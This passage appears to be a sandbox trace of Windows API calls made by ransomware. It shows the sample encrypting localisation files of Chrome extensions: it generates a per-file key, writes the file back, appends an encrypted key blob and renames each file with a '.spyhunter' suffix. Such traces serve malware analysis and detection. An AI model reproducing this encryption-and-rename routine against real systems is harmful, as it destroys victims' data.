HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.spyhunter")) returned 1 [0134.613] GetProcessHeap () returned 0x2c0000 [0134.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.613] GetProcessHeap () returned 0x2c0000 [0134.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.613] GetProcessHeap () returned 0x2c0000 [0134.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82b18 | out: hHeap=0x2c0000) returned 1 [0134.614] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5f8 | out: pbBuffer=0x57f5f8) returned 1 [0134.614] GetProcessHeap () returned 0x2c0000 [0134.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.614] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5f0*=0x30) returned 1 [0134.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0134.660] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json") returned 159 [0134.660] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.660] GetProcessHeap () returned 0x2c0000 [0134.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.660] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f5b4*=0xf6, lpOverlapped=0x0) returned 1 [0134.661] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.661] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x57f5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f5b4*=0xf6, lpOverlapped=0x0) returned 1 [0134.661] GetProcessHeap () returned 0x2c0000 [0134.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.661] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.661] WriteFile (in: hFile=0x17c, lpBuffer=0x57f5f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5b4, lpOverlapped=0x0 | out: lpBuffer=0x57f5f4*, lpNumberOfBytesWritten=0x57f5b4*=0x4, lpOverlapped=0x0) returned 1 [0134.661] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5b4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5b4*=0x30, lpOverlapped=0x0) returned 1 [0134.662] CloseHandle (hObject=0x17c) returned 1 [0134.662] GetProcessHeap () returned 0x2c0000 [0134.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.662] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.spyhunter") returned 169 [0134.662] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json.spyhunter")) returned 1 [0134.662] GetProcessHeap () returned 0x2c0000 [0134.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.662] GetProcessHeap () returned 0x2c0000 [0134.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.663] GetProcessHeap () returned 0x2c0000 [0134.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f818b8 | out: hHeap=0x2c0000) returned 1 [0134.664] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5f0 | out: pbBuffer=0x57f5f0) returned 1 [0134.664] GetProcessHeap () returned 0x2c0000 [0134.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.664] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5e8*=0x30) returned 1 [0134.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0135.116] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json") returned 156 [0135.116] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.116] GetProcessHeap () returned 0x2c0000 [0135.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0135.116] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f5ac*=0x119, lpOverlapped=0x0) returned 1 [0135.117] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffee7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.117] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x57f5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f5ac*=0x119, lpOverlapped=0x0) returned 1 [0135.119] GetProcessHeap () returned 0x2c0000 [0135.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0135.119] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.120] WriteFile (in: hFile=0x17c, lpBuffer=0x57f5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5ac, lpOverlapped=0x0 | out: lpBuffer=0x57f5ec*, lpNumberOfBytesWritten=0x57f5ac*=0x4, lpOverlapped=0x0) returned 1 [0135.120] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5ac*=0x30, lpOverlapped=0x0) returned 1 [0135.120] CloseHandle (hObject=0x17c) returned 1 [0135.120] GetProcessHeap () returned 0x2c0000 [0135.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.120] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.spyhunter") returned 166 [0135.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.spyhunter")) returned 1 [0135.121] GetProcessHeap () returned 0x2c0000 [0135.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.121] GetProcessHeap () returned 0x2c0000 [0135.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.121] GetProcessHeap () returned 0x2c0000 [0135.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f804f8 | out: hHeap=0x2c0000) returned 1 [0135.123] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5e8 | out: pbBuffer=0x57f5e8) returned 1 [0135.123] GetProcessHeap () returned 0x2c0000 [0135.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.123] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5e0*=0x30) returned 1 [0135.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json") returned 156 [0135.138] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.138] GetProcessHeap () returned 0x2c0000 [0135.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.138] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f5a4*=0x112, lpOverlapped=0x0) returned 1 [0135.139] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffeee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.139] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x57f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f5a4*=0x112, lpOverlapped=0x0) returned 1 [0135.139] GetProcessHeap () returned 0x2c0000 [0135.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.139] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.140] WriteFile (in: hFile=0xec, lpBuffer=0x57f5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5a4, lpOverlapped=0x0 | out: lpBuffer=0x57f5e4*, lpNumberOfBytesWritten=0x57f5a4*=0x4, lpOverlapped=0x0) returned 1 [0135.140] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5a4*=0x30, lpOverlapped=0x0) returned 1 [0135.140] CloseHandle (hObject=0xec) returned 1 [0135.140] GetProcessHeap () returned 0x2c0000 [0135.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.140] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.spyhunter") returned 166 [0135.140] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.spyhunter")) returned 1 [0135.141] GetProcessHeap () returned 0x2c0000 [0135.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.141] GetProcessHeap () returned 0x2c0000 [0135.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.141] GetProcessHeap () returned 0x2c0000 [0135.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f730 | out: hHeap=0x2c0000) returned 1 [0135.141] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5e0 | out: pbBuffer=0x57f5e0) returned 1 [0135.141] GetProcessHeap () returned 0x2c0000 [0135.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.142] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5d8*=0x30) returned 1 [0135.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.385] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json") returned 156 [0135.385] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.385] GetProcessHeap () returned 0x2c0000 [0135.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.385] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f59c*=0x11f, lpOverlapped=0x0) returned 1 [0135.386] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffee1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.386] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x11f, lpNumberOfBytesWritten=0x57f59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f59c*=0x11f, lpOverlapped=0x0) returned 1 [0135.386] GetProcessHeap () returned 0x2c0000 [0135.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.386] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.386] WriteFile (in: hFile=0xec, lpBuffer=0x57f5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f59c, lpOverlapped=0x0 | out: lpBuffer=0x57f5dc*, lpNumberOfBytesWritten=0x57f59c*=0x4, lpOverlapped=0x0) returned 1 [0135.386] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f59c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f59c*=0x30, lpOverlapped=0x0) returned 1 [0135.386] CloseHandle (hObject=0xec) returned 1 [0135.386] GetProcessHeap () returned 0x2c0000 [0135.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.386] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.spyhunter") returned 166 [0135.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.spyhunter")) returned 1 [0135.388] GetProcessHeap () returned 0x2c0000 [0135.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.388] GetProcessHeap () returned 0x2c0000 [0135.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.388] GetProcessHeap () returned 0x2c0000 [0135.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fa40 | out: hHeap=0x2c0000) returned 1 [0135.388] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5e0 | out: pbBuffer=0x57f5e0) returned 1 [0135.388] GetProcessHeap () returned 0x2c0000 [0135.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.388] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f5d8*=0x30) returned 1 [0135.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.391] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json") returned 157 [0135.391] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.391] GetProcessHeap () returned 0x2c0000 [0135.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.391] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f59c*=0xb3, lpOverlapped=0x0) returned 1 [0135.392] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.392] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x57f59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f59c*=0xb3, lpOverlapped=0x0) returned 1 [0135.393] GetProcessHeap () returned 0x2c0000 [0135.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.393] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.393] WriteFile (in: hFile=0xec, lpBuffer=0x57f5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f59c, lpOverlapped=0x0 | out: lpBuffer=0x57f5dc*, lpNumberOfBytesWritten=0x57f59c*=0x4, lpOverlapped=0x0) returned 1 [0135.393] WriteFile (in: hFile=0xec, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f59c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f59c*=0x30, lpOverlapped=0x0) returned 1 [0135.393] CloseHandle (hObject=0xec) returned 1 [0135.393] GetProcessHeap () returned 0x2c0000 [0135.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.393] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.spyhunter") returned 167 [0135.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.spyhunter")) returned 1 [0135.394] GetProcessHeap () returned 0x2c0000 [0135.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.394] GetProcessHeap () returned 0x2c0000 [0135.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0135.395] GetProcessHeap () returned 0x2c0000 [0135.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1be50 | out: hHeap=0x2c0000) returned 1 [0135.396] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f5d8 | out: pbBuffer=0x57f5d8) returned 1 [0135.396] GetProcessHeap () returned 0x2c0000 [0135.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0135.396] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f5d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, 